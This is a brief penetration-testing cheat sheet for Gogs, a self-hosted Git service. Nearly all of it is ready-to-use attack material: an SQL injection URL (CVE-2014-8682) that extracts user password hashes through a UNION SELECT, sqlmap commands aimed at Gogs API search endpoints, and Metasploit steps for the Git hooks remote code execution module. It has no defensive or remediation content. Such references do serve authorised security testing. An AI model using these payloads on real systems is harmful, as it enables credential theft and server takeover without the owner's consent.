icon

Gogs Pentesting

Last modified: 2023-04-27

Gogs (Go Git Service) is a painless self-hosted Git Service.

SQL injection (CVE-2014-8682)

http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

Automation

sqlmap -u "https://example.com/api/v1/repos/search?q=test"
sqlmap -u "https://example.com/api/v1/users/search?q=test"

Git Hooks Remote Code Execution (RCE)

msfconsole
msf> use exploit/multi/http/gogs_git_hooks_rce
msf> (set options...)
msf> run